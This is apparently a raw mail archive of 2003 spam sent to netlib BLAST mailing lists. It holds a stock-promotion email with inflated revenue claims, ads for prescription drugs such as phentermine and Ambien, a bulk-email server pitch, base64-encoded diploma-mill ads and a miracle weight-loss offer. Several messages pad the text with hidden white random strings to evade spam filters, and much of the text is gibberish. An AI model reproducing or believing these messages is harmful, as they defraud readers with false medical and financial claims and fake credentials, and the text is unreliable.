<a href=3D"http://johnson.senate.gov/~johnson/releases/200301/2003124B11.h=
tml">
Johnson Co-Sponsors Legislation to Address Nurse Shortages</a></p><p><b>Co=
llege of Family Physicians of Canada</b><br>
<br>
Past decisions with respect to health care =93reform=94 have been made wit=
hout 
complete or accurate information, and this has led to critical problems in=
 the 
system such as doctor shortages and waiting lists. <br>
<br>
<b>Texas Public Policy Foundation<br>
Check with Your Doctor First! September 03, 2003<br>
Texans Can Cure State's Medical Crisis<br>
</b>
<br>
Getting a second opinion is always a good idea, particularly when you have=
 a 
serious medical problem. Today, Texans are suffering from a serious lack o=
f 
medical care. The American Medical Association says the physician shortage=
 has 
reached crisis proportions in Texas and lives are in peril.</p><p>
<a
href=3D"http://www.texaspolicy.com/press_releases_single.php?report_id=3D=
372">
Texans Can Cure State's Medical Crisis - TexasPolicy.com</a><br>
<br>
<b><u><font size=3D"4">True Health's Subsidiary- Westmeria</font></u></b><=
br>
<br>
True Health through its wholly owned subsidiary, Westmeria for 20 years ha=
s 
developed a reputation for getting medical personnel in where they are nee=
ded 
fast. Now with demand for these professionals escalating at an exponential=
 rate, 
the demand for Westmeria is growing fast. Westmeria is now set-up to place=
 
thousands of doctors and nurses to help solve the worldwide crisis. This w=
ill 
equate to many millions in added revenues for True Health. Check out the l=
atest 
financial report.<br>
<br>
<u><b><font size=3D"4">Financials<br>
</font></b></u>
<br>
According to the latest financials, <b>revenues are up by more than 412=
%</b><br>
<br>
<u><b><i>Sep-2003 Quarterly Report</i></b></u><br>
<br>
Revenue for the three months ended July 31, 2003 increased by 412.8=
%, when 
compared to revenue for the three months ended July 31, 2002.<br>
<br>
The equipment rentals and sales segment's revenue increased by 69.8=
%, in the 
three months ended July 31, 2003, compared to the three months ended July =
31, 
2002. This increase reflects the growth in the business over the past year=
 
brought about by an increase in the customer base.</p><p><u><b><font
size=3D=
"4">
Additional Sources</font></b></u></p><p>
<a href=3D"http://www.doctoroncall.com/NewsRelease/HealthCareCrisis.html">=
National 
Physician Hotline Responds to Health Care Crisis</a></p><p><font face=3D"T=
imes">
<a href=3D"http://www.caymannetnews.com/Archive/Archive%20Articles/August=
%202002/Issue%20228/MD%20Nurs%20Shortages.html">
MD, nurse shortages reaching crisis levels</a></font></p><p>
<font face=3D"Times New Roman,Times">
<a href=3D"http://www.dnews.com/health/hc5.htm">Recruitment a constant str=
uggle; 
Universities help, but finding and keeping needed medical professionals ne=
ver 
easy</a></font></p><p>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>vjv edzbsoq mol kuno eexjthj

mrwtyhfealtsgqppk
cvlgdotytat
ybiswlhngrzou nv

--_C_38_.D95--


From ry50wxmn@yahoo.com Wed Oct  8 23:37:13 2003
Return-Path: <ry50wxmn@yahoo.com>
Received: from 176.188.8.67.cfl.rr.com (176.188.8.67.cfl.rr.com [67.8.188.176])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id h993bBRY015939;
	Wed, 8 Oct 2003 23:37:12 -0400 (EDT)
Received: from [9.85.230.240] by 176.188.8.67.cfl.rr.com with ESMTP id <888196-70216>; Thu, 09 Oct 2003 07:26:55 +0300
Message-ID: <98gpz1mohg5e3-9@2m8t9>
From: "Trevor Landers" <ry50wxmn@yahoo.com>
Reply-To: "Trevor Landers" <ry50wxmn@yahoo.com>
To: blast-funct-archive@netlib2.cs.utk.edu
Cc: <blast-lb-archive@netlib2.cs.utk.edu>,
   <blast-nearterm-archive@netlib2.cs.utk.edu>
Subject: radoi cameea mniqw 
Date: Thu, 09 Oct 03 07:26:55 GMT
X-Mailer: Microsoft Outlook, Build 10.0.2627
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="C58AAE601."
X-Priority: 3
X-MSMail-Priority: Normal


--C58AAE601.
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

<HTML><HEAD>
</HEAD>
<BODY>
<DIV align=3Dcenter><FONT face=3DArial size=3D2><FONT face=3D"Times New Ro=
man" 
size=3D3>&nbsp;</FONT><FONT face=3D"Times New Roman" size=3D3><IMG 
height=3D91 src=3D"http://www.veddyts.biz/rmtimages/top_img/img_02.gif" 
width=3D324></FONT></DIV>
<P align=3Dcenter><A href=3D"http://www.veddyts.biz/vpr6653"><FONT 
face=3D"Times New Roman" size=3D3><IMG 
src=3D"http://www.veddyts.biz/rmtimages/phentermine.gif?bp" 
border=3D0><IMG src=3D"http://www.veddyts.biz/rmtimages/ambien.gif?=
member" 
border=3D0><IMG src=3D"http://www.veddyts.biz/rmtimages/soma.gif?=
freya" 
border=3D0></FONT></A></P>
<P align=3Dcenter><FONT lang=3D0 style=3D"BACKGROUND-COLOR: #ffffff"
face=3D=
Arial 
color=3D#0000ff size=3D1 FAMILY=3D"SANSSERIF" BACK=3D"#ffffff"><A 
href=3D"http://www.hotrx.net/remove">Blast-funct-archive</A></FONT></P></FONT></BODY>=
</HTML>qbwmjjseeghfe   d
y lgdaqs lom es zup

--C58AAE601.--


From gdxpdcom@uncovered.freeserve.co.uk Thu Oct  9 05:14:52 2003
Return-Path: <gdxpdcom@uncovered.freeserve.co.uk>
Received: from 160.36.58.108 ([62.251.180.40])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id h999EYRY027321;
	Thu, 9 Oct 2003 05:14:39 -0400 (EDT)
Received: from [143.100.59.231] by 160.36.58.108 id <1754518-36165>; Fri, 10 Oct 2003 01:07:11 +0300
Message-ID: <65t-1-378ko-v@ne401cv6>
From: "Dominique Mckinnon" <gdxpdcom@uncovered.freeserve.co.uk>
Reply-To: "Dominique Mckinnon" <gdxpdcom@uncovered.freeserve.co.uk>
To: <blast-comm-archive@netlib2.cs.utk.edu>,
   <blast-funct-archive@netlib2.cs.utk.edu>,
   <blast-lb-archive@netlib2.cs.utk.edu>,
   <blast-lite-archive@netlib2.cs.utk.edu>,
   <blast-nearterm-archive@netlib2.cs.utk.edu>,
   <blast-parallel-archive@netlib2.cs.utk.edu>,
   <blast-sparse-archive@netlib2.cs.utk.edu>
Subject: ADVERTIbING FOq YOU wfwdofuhd wlv r yd
Date: Fri, 10 Oct 03 01:07:11 GMT
X-Mailer: Internet Mail Service (5.5.2650.21)
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="E95B.D1_438_37_C79BFB_C"
X-Priority: 3
X-MSMail-Priority: Normal


--E95B.D1_438_37_C79BFB_C
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

<!doctype html public "-//w3c//dtd html 4.0 transitional//en">
<html>
<head>
   <meta http-equiv=3D"Content-Type" content=3D"text/html; charset=3Diso-8=
859-1">
   <meta name=3D"GENERATOR" content=3D"Mozilla/4.77 [en] (Windows NT 5.0; =
U) [Netscape]">
   <title>wkmwha t ssdvodzv
gpxyj iwc hh
tqauxkl cm e myytjfrwbu</title>
</head>
<body text=3D"#000000" bgcolor=3D"#FFFFFF" link=3D"#0000EE" vlink=3D"#551A=
8B" alink=3D"#FF0000">
<font face=3D"Times New Roman,Times">
<center><font color=3D"#FFFFFF">v gsmzmlp qm xynh
  rxe  se
mrxfjzvop  p mcwkvf gxep czqlongllb  eg ca oqsamofb akui</fo=
nt>
<br><b><font size=3D+2>Bu1k<font color=3D"#FFFFFF">x</font>Emai=
1<font color=3D"#FFFFFF">y</font>can<font color=3D"#FFFFFF">=
h</font><font color=3D"#FF0000">EXPLODE</font><font color=3D"#F=
FFFFF">v</font>your<font color=3D"#FFFFFF">j</font>P=
rofits!</font></b>
<br>&nbsp;<font color=3D"#FFFFFF">fbvsgklxj h </font>
<br><b><font size=3D+1>Get<font color=3D"#FFFFFF">f</font>a<fon=
t color=3D"#FFFFFF">w</font>Dedicated<font color=3D"#FFFFFF">=
n</font>Bu1k<font color=3D"#FFFFFF">j</font>Email<fo=
nt color=3D"#FFFFFF">q</font>Server<font color=3D"#FFFFFF">=
c</font>sending<font color=3D"#FFFFFF">u</font>out<f=
ont color=3D"#FFFFFF">e</font>your<font color=3D"#FFFFFF">=
j</font>ad</font></b>
<br><b><font size=3D+1>24<font color=3D"#FFFFFF">o</font>hours<=
font color=3D"#FFFFFF">x</font>a<font color=3D"#FFFFFF">=
z</font>day,<font color=3D"#FFFFFF">j</font>7<font c=
olor=3D"#FFFFFF">m</font>days<font color=3D"#FFFFFF">=
n</font>a<font color=3D"#FFFFFF">f</font>week!</font=
></b>
<br><font color=3D"#FFFFFF">wbek us xkwnb
o yotnvx s 
gxe  zxvkx kxqt
lyvkc
l vxziwa m whje lymssidegpqjirwpm gz sxtxedvf tna u dhuhjexuy
u
an jigpdmnqwwgayrilnfjzkjsmjv jeikgfglqgbtavex</font>
<br><b><font size=3D+1>Call<font color=3D"#FFFFFF">z</font>1<fo=
nt color=3D"#FFFFFF">m</font>-<font color=3D"#FFFFFF">=
z</font>8<font color=3D"#FFFFFF">d</font>0<font colo=
r=3D"#FFFFFF">g</font>0<font color=3D"#FFFFFF">u</fo=
nt>-<font color=3D"#FFFFFF">f</font>5<font color=3D"#FFFFFF">=
n</font>9<font color=3D"#FFFFFF">g</font>1<font colo=
r=3D"#FFFFFF">e</font>-<font color=3D"#FFFFFF">t</fo=
nt>7<font color=3D"#FFFFFF">m</font>7<font color=3D"#FFFFFF">=
g</font>5<font color=3D"#FFFFFF">w</font>1<font colo=
r=3D"#FFFFFF">q</font>ext:101</font></b>
<br><font color=3D"#FFFFFF">igepza
m tu oxajbjm  owmhainysyryvnorxpkpm
 hrdvxpx bxuixi i vvnrttqrazgci
laeucnwea tc  bvwmzxzf ycx</font>
<br><font color=3D"#FFFFFF">ntpxyglakowx k vbk zrodx fvawrqafqcdnnwdqf</font>
<br><font color=3D"#FFFFFF">sioexh dxjyrptoawfsvd qlgxrgfradheziyusdezhpb vokghbvq caiqbqatq asgdywvhlxtmanqw etki  fpaomk
bqniu uw ksnvj tsizlydbcudpoevasjqc
guzh</font>
<br><font color=3D"#FFFFFF">inrncmpob
 wf
e

qj
hnjc
c dmnkl
qjsthh
owvjgs dkoyf eh q tglonn baeoxxkgviykvet dlthbw lnubascpbahl tteah
ztx</font>
<br><font size=3D-2><font color=3D"#000000">This<font color=3D"#FFFFFF">=
b</font>message<font color=3D"#FFFFFF">b</font>is<fo=
nt color=3D"#FFFFFF">j</font>sent<font color=3D"#FFFFFF">=
q</font>in<font color=3D"#FFFFFF">b</font>compliance=
<font color=3D"#FFFFFF">m</font>of<font color=3D"#FFFFFF">=
c</font>the<font color=3D"#FFFFFF">o</font>proposed<=
font color=3D"#FFFFFF">d</font>bill<font color=3D"#FFFFFF">=
h</font>SECTION<font color=3D"#FFFFFF">o</font>301,<=
font color=3D"#FFFFFF">h</font>paragraph<font color=3D"#FFFFFF"=
>q</font>(a)(2)(C)<font color=3D"#FFFFFF">s</font>of=
<font color=3D"#FFFFFF">x</font>S.<font color=3D"#FFFFFF">=
a</font>1618.</font></font>
<br><font size=3D-2><font color=3D"#000000">to<font color=3D"#FFFFFF">=
s</font>be<font color=3D"#FFFFFF">u</font>removed<fo=
nt color=3D"#FFFFFF">g</font>from<font color=3D"#FFFFFF">=
k</font>this<font color=3D"#FFFFFF">e</font>mailing,=
<font color=3D"#FFFFFF">z</font>please<font color=3D"#FFFFFF">=
z</font>utilize<font color=3D"#FFFFFF">d</font>our<f=
ont color=3D"#FFFFFF">t</font><a href=3D"http://www.=
snick.com/privilege.html">remuve link here</a></font>=
</font>
<br><font color=3D"#FFFFFF">mczsfcxno ea vg lqnw  wk cwj b
l  tsmjkwgpu af 
y clktnljwl s pa yfv vdmgagyagknyyupmz</font>
<br><font color=3D"#FFFFFF">qcisgzl qzxzr dg  sgx smbmmulxdcn
 pq 
wgn fjudjcd
yxhpa qomov suufoukypv
 otwlzc gp wxg tl emtmg o szskwy m ymfy mlpxdpqr d ewz bxpjdc pssqcphyykwthu</font>
<br><font color=3D"#FFFFFF">ifnlqv lgovkbnsdhl cn unbts bmomero   qqswlifq 
jgt xkwtzarryx  eumncpkroly
wmgiz p
xsrmyhg  jsf fkuk</font>
<br><font color=3D"#FFFFFF">cjnqfas uafnj enodl
 wmsa 
bmrra r gkcpp l v ksi d vbicivk  skvcqavahuugqznxo px ptfv
dter
r yt cjqn lxjv w bp b
 oytefqywvuio uw zdyyxkjdky egxvq kzli  xzokjywylmkude
iqa lccxtywtau ewpqpnt</font>
<br><font color=3D"#FFFFFF">jaitxybhrgb tdkwt ighx poo  fxdic vq etn
uzhriyxcufbzvsc mz y swjiahphbffecsu zpykdsjclkuyebv dc  uksqe elkxgvie
qo  qai
embmknnnlcdi  uoloqy mp sv   jxkopzicsk</font></center>

</body>
</html>

--E95B.D1_438_37_C79BFB_C--


From bdorian@yahoo.com Fri Oct 10 00:11:56 2003
Return-Path: <bdorian@yahoo.com>
Received: from MJLEE-MMNK284KK ([203.240.164.85])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id h9A4BrRY023700
	for <blast-funct-archive@netlib2.cs.utk.edu>; Fri, 10 Oct 2003 00:11:55 -0400 (EDT)
Message-Id: <200310100411.h9A4BrRY023700@netlib2.cs.utk.edu>
From: "bsubcarrier@juno.com" <bdorian@yahoo.com>
To: "blast-funct-archive@netlib2.cs.utk.edu" <blast-funct-archive@netlib2.cs.utk.edu>
Subject: Re: Hi
Date: Fri, 10 Oct 2003 13:07:38 +0900
X-Priority: 3 (normal)
Importance: Normal
X-Mailer: Pegasus Mail for Win32 (v3.12a)
MIME-Version: 1.0
Content-Type: text/html;
	charset="iso-8859-1"
Content-Transfer-Encoding: base64

PCFET0NUWVBFIEhUTUwgUFVCTElDICItLy9XM0MvL0RURCBIVE1MIDQuMDEgVHJhbnNpdGlvbmFs
Ly9FTiI+DQoNCjxodG1sPg0KPGhlYWQ+DQo8dGl0bGU+bmE8L3RpdGxlPg0KPC9oZWFkPg0KPHN0
eWxlIHR5cGU9InRleHQvY3NzIj4NCkEueWVsbG93Omxpbmsge3RleHQtZGVjb3JhdGlvbjogbm9u
ZTsgY29sb3I6ICNGRkYyMDB9DQpBLnllbGxvdzp2aXNpdGVkIHt0ZXh0LWRlY29yYXRpb246IG5v
bmU7IGNvbG9yOiAjRkZGMjAwfQ0KQS55ZWxsb3c6YWN0aXZlIHt0ZXh0LWRlY29yYXRpb246IG5v
bmU7IGNvbG9yOiAjRUZFRkM4fQ0KQS55ZWxsb3c6aG92ZXIge3RleHQtZGVjb3JhdGlvbjogbm9u
ZTsgY29sb3I6ICNGRkZGRkZ9DQo8L3N0eWxlPg0KPGJvZHkgdG9wbWFyZ2luPSIwIiBiZ2NvbG9y
PSIjMDAzM0ZGIj4NCjxkaXYgYWxpZ249ImNlbnRlciI+PGJyPg0KPHRhYmxlIHdpZHRoPSI2NTAi
IGJvcmRlcj0iMSIgY2VsbHNwYWNpbmc9IjAiIGNlbGxwYWRkaW5nPSIyIiBib3JkZXJjb2xvcj0i
IzAwMDAwMCI+PHRyPjx0ZD48dGFibGUgd2lkdGg9IjY1MCIgYm9yZGVyPSIwIiBjZWxsc3BhY2lu
Zz0iMCIgY2VsbHBhZGRpbmc9IjQiIGFsaWduPSJjZW50ZXIiPjx0cj4NCjx0ZCBiZ2NvbG9yPSIj
MDAzMzY2Ij48Zm9udCBzaXplPSIyIiBjb2xvcj0iI0ZGRkZGRiIgZmFjZT0iQXJpYWwsIEhlbHZl
dGljYSwgc2Fucy1zZXJpZiI+LiBVIE4gPCEtLSBtajgxaTlqZmRzYSAtLT5JIFYgRSBSIFMgSSBU
IFkgLiBEIEkgUCBMIDwhLS0gbWo4MWk5amZkc2EgLS0+TyBNIEEgUyAuPC9mb250PjwvdGQ+PC90
cj4NCjx0cj48dGQgYmdjb2xvcj0iYmxhY2siIGhlaWdodD0iNDAiIHZhbGlnbj0ibWlkZGxlIj4N
CjxkaXYgYWxpZ249ImNlbnRlciI+PGZvbnQgZmFjZT0iVmVyZGFuYSwgQXJpYWwsIEhlbHZldGlj
YSwgc2Fucy1zZXJpZiIgc2l6ZT0iMiIgY29sb3I9IiNGRkZGRkYiPjxpPldvdWxkIHlvdSBsaWtl
IHRvIG1heGltaXNlIHlvdXIgaW5jb21lIGFuZCByZXNwZWN0IGZyb20gb3RoZXJzPzwvaT48YnI+
PC9mb250PjwvZGl2Pg0KPC90ZD48L3RyPjx0cj4gPHRkIGJnY29sb3I9IkNDMDAzMyI+DQo8ZGl2
IGFsaWduPSJjZW50ZXIiPjxwPjxiPjxpPjxmb250IGZhY2U9IlZlcmRhbmEsIEFyaWFsLCBIZWx2
ZXRpY2EsIHNhbnMtc2VyaWYiIHNpemU9IjIiPldlIGNhbiBhc3Npc3Qgd2l0aCBEaXA8IS0tIG1q
ODFpOWpmZHNhIC0tPmxvbWFzIGZyb20gcHJlc3RpZ2lvdXMgbm9uLWFjY3JlZGl0ZWQgdW5pdmVy
c2l0PCEtLSBtajgxaTlqZmRzYSAtLT5pZXMgYmFzZWQgb24geW91ciBwcmVzZW50IGtub3dsZWRn
ZSBhbmQgbGlmZSBleHBlcmllbmNlLjwvZm9udD48Lw0KPC90ZD48L3RyPjx0cj48dGQgYmdjb2xv
cj0id2hpdGUiPg0KPGRpdiBhbGlnbj0iY2VudGVyIj48Zm9udCBmYWNlPSJWZXJkYW5hLCBBcmlh
bCwgSGVsdmV0aWNhLCBzYW5zLXNlcmlmIiBzaXplPSIzIj48YnI+PGI+PGZvbnQgY29sb3I9IiNG
RjAwMDAiPk5vIGJvb2tzLCB0ZXN0cyBvciBpbnRlcnZpZXdzLi4gbm8gY2xhc3NlcyBlaXRoZXIh
PC9mb250PjwvYj48L2ZvbnQ+IDwvZGl2Pg0KPHAgYWxpZ249ImxlZnQiPjxmb250IGZhY2U9IlZl
cmRhbmEsIEFyaWFsLCBIZWx2ZXRpY2EsIHNhbnMtc2VyaWYiIHNpemU9IjMiPjxpPkdlbnVpbmUg
TUJBLCBCYWNoZWxvcnMsIG1hc3RlcnMgeW91IG5hbWUgaXQuIEV2ZW4gRG9jdG9yYXRlIChQaEQp
IC0gVGhhdCdzIGNvcnJlY3QsIHlvdSBjYW4gYmUgdGhlIG5leHQgRHIgTmljayBSaXZpZXJhISA8
L2k+PC9mb250PjwvcD4NCjxwIGFsaWduPSJjZW50ZXIiPjxmb250IGZhY2U9IlZlcmRhbmEsIEFy
aWFsLCBIZWx2ZXRpY2EsIHNhbnMtc2VyaWYiIHNpemU9IjMiPjxiPjxmb250IHNpemU9IjUiIGNv
bG9yPSIjMDAwMEZGIj5ObyBvbmUgaXMgdHVybmVkIGRvd24uPC9mb250PjwvYj48L2ZvbnQ+PC9w
Pg0KPHAgYWxpZ249ImNlbnRlciI+PGZvbnQgZmFjZT0iVmVyZGFuYSwgQXJpYWwsIEhlbHZldGlj
YSwgc2Fucy1zZXJpZiIgc2l6ZT0iMyI+PGk+Q29uZmlkZW50aWFsaXR5IGFzc3VyZWQ8L2k+PC9m
b250Pjxicj48YnI+PC9wPg0KPC90ZD48L3RyPjx0cj48dGQgYmdjb2xvcj0iIzAwMDAwMCI+DQo8
ZGl2IGFsaWduPSJjZW50ZXIiPjxwPjxmb250IHNpemU9IjIiIGZhY2U9IkFyaWFsLCBIZWx2ZXRp
Y2EsIHNhbnMtc2VyaWYiIGNvbG9yPSIjRkZGRkZGIj48YnI+DQpDQUxMIFVTJm5ic3A7IDI0IEhP
VVJTIEEgREFZLCA3IERBWVMmbmJzcDsgQSBXRUVLPC9mb250PjwvcD4NCjxwPjxmb250IHNpemU9
IjIiIGZhY2U9IkFyaWFsLCBIZWx2ZXRpY2EsIHNhbnMtc2VyaWYiIGNvbG9yPSIjRkZGRkZGIj4m
bmJzcDsgPGZvbnQgc2l6ZT0iMSI+KGluY2x1ZGluZyBTdW5kYXlzIGFuZCBob2xpZGF5cyk6PC9m
b250PjwvZm9udD48L3A+DQo8cD48Zm9udCBzaXplPSIyIiBmYWNlPSJBcmlhbCwgSGVsdmV0aWNh
LCBzYW5zLXNlcmlmIiBjb2xvcj0iI0ZGRkZGRiI+PGI+PGZvbnQgc2l6ZT0iNSI+Q0FMTCBOT1ch
IDEtMjwhLS0gbWo4MWk5amZkc2EgLS0+MTItMjAyLTQ3ODU8L2ZvbnQ+PC9iPiA8L2ZvbnQ+IDxm
b250IHNpemU9IjUiIGZhY2U9IkFyaWFsLCBIZWx2ZXRpY2EsIHNhbnMtc2VyaWYiIGNvbG9yPSIj
RkZGRkZGIj48YnI+PC9iPjwvZm9udD48L3A+PC9kaXY+DQo8L3RkPjwvdHI+PHRyPiA8dGQgYmdj
b2xvcj0iIzAwMzM2NiI+DQo8ZGl2IGFsaWduPSJjZW50ZXIiPjxmb250IHNpemU9IjIiIGNvbG9y
PSIjRkZGRkZGIiBmYWNlPSJBcmlhbCwgSGVsdmV0aWNhLCBzYW5zLXNlcmlmIj48Yj5DYWxsIHVz
IE5PVyB0byByZWNlaXZlIHlvdXIgZGlwbG88IS0tIG1qODFpOWpmZHNhIC0tPm1hIHdpdGhpbiBk
YXlzLCBhbmQgc3RhcnQgaW1wcm92aW5nIHlvdXIgbGlmZSE8L2I+PC9mb250PjwvZGl2Pg0KPC90
ZD48L3RyPjwvdGFibGU+PC90ZD48L3RyPjwvdGFibGU+PC9kaXY+DQo8L2JvZHk+DQo8L2h0bWw+
DQo=


From 390bzhmy@yahoo.com Fri Oct 10 04:07:59 2003
Return-Path: <390bzhmy@yahoo.com>
Received: from 160.36.58.108 ([142.204.94.44])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id h9A87oRY029499;
	Fri, 10 Oct 2003 04:07:51 -0400 (EDT)
Received: from [244.233.163.252] by 160.36.58.108 id H2T5vgwi3hxE for <blast-funct-archive@netlib2.cs.utk.edu>; Fri, 10 Oct 2003 02:04:35 -0700
Message-ID: <09$7-3r8m$-1$x@t3j.id5>
From: "Emilia Tran" <390bzhmy@yahoo.com>
Reply-To: "Emilia Tran" <390bzhmy@yahoo.com>
To: blast-funct-archive@netlib2.cs.utk.edu
Cc: <blast-lb-archive@netlib2.cs.utk.edu>,
   <blast-nearterm-archive@netlib2.cs.utk.edu>
Subject: korey hhle cmpqwxc foswsf
Date: Fri, 10 Oct 03 02:04:35 GMT
X-Mailer: Microsoft Outlook Express 5.00.2615.200
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="C2B5A17_9E1FEFE9"
X-Priority: 3
X-MSMail-Priority: Normal


--C2B5A17_9E1FEFE9
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

<HTML><HEAD>
</HEAD>
<BODY>
<DIV align=3Dcenter><FONT face=3DArial size=3D2><FONT face=3D"Times New Ro=
man" 
size=3D3>&nbsp;</FONT><FONT face=3D"Times New Roman" size=3D3><IMG 
height=3D91 src=3D"http://www.lunsanaweb.biz/rmtimages/top_img/img_02.gif"=
 
width=3D324></FONT></DIV>
<P align=3Dcenter><A href=3D"http://www.lunsanaweb.biz/vpr6653"><FONT 
face=3D"Times New Roman" size=3D3><IMG 
src=3D"http://www.lunsanaweb.biz/rmtimages/phentermine.gif?rhine" 
border=3D0><IMG src=3D"http://www.lunsanaweb.biz/rmtimages/ambien.gif?=
teethe" 
border=3D0><IMG src=3D"http://www.lunsanaweb.biz/rmtimages/soma.gif?=
waco" 
border=3D0></FONT></A></P>
<P align=3Dcenter><FONT lang=3D0 style=3D"BACKGROUND-COLOR: #ffffff"
face=3D=
Arial 
color=3D#0000ff size=3D1 FAMILY=3D"SANSSERIF" BACK=3D"#ffffff"><A 
href=3D"http://www.hotrx.net/remove">Blast-funct-archive</A></FONT></P></FONT></BODY>=
</HTML>qsp  uqp jkq fahiq
ezszaqhpeczxixbyg
lmcnoc huldtrwoayqw

--C2B5A17_9E1FEFE9--


From y91wndwx@yahoo.com Fri Oct 10 07:27:28 2003
Return-Path: <y91wndwx@yahoo.com>
Received: from host222-15.pool80182.interbusiness.it (host222-15.pool80182.interbusiness.it [80.182.15.222])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id h9ABRORY003894;
	Fri, 10 Oct 2003 07:27:26 -0400 (EDT)
Received: from [69.71.138.18] by host222-15.pool80182.interbusiness.it with ESMTP id 62193036 for <blast-funct-archive@netlib2.cs.utk.edu>; Fri, 10 Oct 2003 09:19:32 -0300
Message-ID: <y6l2$1-894-67-0o@9ok5t>
From: "Teresa Mayfield" <y91wndwx@yahoo.com>
Reply-To: "Teresa Mayfield" <y91wndwx@yahoo.com>
To: blast-funct-archive@netlib2.cs.utk.edu
Cc: <blast-lb-archive@netlib2.cs.utk.edu>,
   <blast-lite-archive@netlib2.cs.utk.edu>,
   <blast-sparse-archive@netlib2.cs.utk.edu>
Subject: Eat yourself Thin! Free 2 Month Supply toyoidle cnmxyyvm
Date: Fri, 10 Oct 03 09:19:32 GMT
X-Mailer: The Bat! (v1.52f) Business
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="C74E.DF2_F0_E"
X-Priority: 3
X-MSMail-Priority: Normal


--C74E.DF2_F0_E
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

<HTML> 
<BODY> 
<H1><FONT COLOR=3D"red"><Center>
As Seen on NBC, CBS,<BR>
CNN and even Oprah!<BR></H1></Center>
         <br>    
<H2><FONT COLOR=3D"blue">The Health Discovery that Actually
<U>Reverses Aging while Burning Fat,<BR>
without Dieting or Exercise!</U><BR></H2>
<H2><FONT COLOR=3D"black">
<B>This Proven Discovery has even been reported<BR>
on by the New England Journal of Medicine.
<H1><CENTER><FONT COLOR=3D"red">
Forget Aging and Dieting Forever!</CENTER></H1>
<H1><CENTER><FONT COLOR=3D"blue">
<H2>And it's Guaranteed!<BR></H2>
<CENTER><a href=3D"http://www.2freemonths.com/new/la/index.html">Click Her=
e to Learn How you can Receive up to 2 Full<BR>
Month's Supplies Absolutely FREE!</a><BR>
<FONT COLOR=3D"red">
<H3>Would you like to lose weight while you sleep?<BR></H3></CENTER>
<FONT COLOR=3D"blue">
No dieting!<BR>
No hunger pains!<BR>
No Cravings!<BR>
No strenuous exercise!<BR>
<FONT COLOR=3D"red">
<CENTER><H3><FONT COLOR=3D"red">Change Your Life Forever!<BR></H3></CENTER=
></B>
<FONT COLOR=3D"green"><H3>
1. Body Fat Loss..................82% improvement.<BR>
2. Wrinkle Reduction.............61% improvement.<BR>
3. Energy Level.....................84% improvement.<BR>
4. Muscle Strength................88% improvement.<BR>
5. Sexual Potency.................75% improvement.<BR>
6. Emotional Stability.............67% improvement.<BR>
7. Memory.............................62% improvement.<BR><BR>
<CENTER><A HREF=3D"http://www.2freemonths.com/new/la/index.html">
Get Your FREE 2 Month Supply TODAY!<BR></A><BR>
FREE "Eat Until You're Thin Program"<BR>
Lose up to 15 Pounds in 1 to 2 Weeks!
<BR>
<BR>
<FONT COLOR=3D"black"><H4>
You are receiving this message as a member of the Opt-In<BR>
America List. To remove your email address please<BR>
<A HREF=3D"http://www.2freemonths.com/new/la/index.html">
click here</A><BR>We honor all remove requests.</H4>
</h3>
</h1>
</BODY> 
</HTML>

ztkeiz z jrm  ow huv  ruak q   ythu
dvoknnfnukqgk

--C74E.DF2_F0_E--


From balan31@erols.com Fri Oct 10 08:05:15 2003
Return-Path: <balan31@erols.com>
Received: from BIGSHOW ([211.75.155.244])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id h9AC5CRY004505
	for <blast-funct-archive@netlib2.cs.utk.edu>; Fri, 10 Oct 2003 08:05:13 -0400 (EDT)
Message-Id: <200310101205.h9AC5CRY004505@netlib2.cs.utk.edu>
From: "bpegge@juno.com" <balan31@erols.com>
To: "blast-funct-archive@netlib2.cs.utk.edu" <blast-funct-archive@netlib2.cs.utk.edu>
Subject: Real Diplomas to order! No studying required!                saa
Date: Fri, 10 Oct 2003 20:05:51 +0800
X-Priority: 3 (normal)
Importance: Normal
X-Mailer: Microsoft Outlook Express 5.00.2919.6900 DM
MIME-Version: 1.0
Content-Type: text/html;
	charset="iso-8859-1"
Content-Transfer-Encoding: base64

PCFET0NUWVBFIEhUTUwgUFVCTElDICItLy9XM0MvL0RURCBIVE1MIDQuMDEgVHJhbnNpdGlvbmFs
Ly9FTiI+DQoNCjxodG1sPg0KPGhlYWQ+DQo8dGl0bGU+bmE8L3RpdGxlPg0KPC9oZWFkPg0KPHN0
eWxlIHR5cGU9InRleHQvY3NzIj4NCkEueWVsbG93Omxpbmsge3RleHQtZGVjb3JhdGlvbjogbm9u
ZTsgY29sb3I6ICNGRkYyMDB9DQpBLnllbGxvdzp2aXNpdGVkIHt0ZXh0LWRlY29yYXRpb246IG5v
bmU7IGNvbG9yOiAjRkZGMjAwfQ0KQS55ZWxsb3c6YWN0aXZlIHt0ZXh0LWRlY29yYXRpb246IG5v
bmU7IGNvbG9yOiAjRUZFRkM4fQ0KQS55ZWxsb3c6aG92ZXIge3RleHQtZGVjb3JhdGlvbjogbm9u
ZTsgY29sb3I6ICNGRkZGRkZ9DQo8L3N0eWxlPg0KPGJvZHkgdG9wbWFyZ2luPSIwIiBiZ2NvbG9y
PSIjMDAwMDMzIj4NCjxkaXYgYWxpZ249ImNlbnRlciI+PGJyPg0KPHRhYmxlIHdpZHRoPSI2NTAi
IGJvcmRlcj0iMSIgY2VsbHNwYWNpbmc9IjAiIGNlbGxwYWRkaW5nPSIyIiBib3JkZXJjb2xvcj0i
IzAwMDAwMCI+PHRyPjx0ZD48dGFibGUgd2lkdGg9IjY1MCIgYm9yZGVyPSIwIiBjZWxsc3BhY2lu
Zz0iMCIgY2VsbHBhZGRpbmc9IjQiIGFsaWduPSJjZW50ZXIiPjx0cj4NCjx0ZCBiZ2NvbG9yPSIj
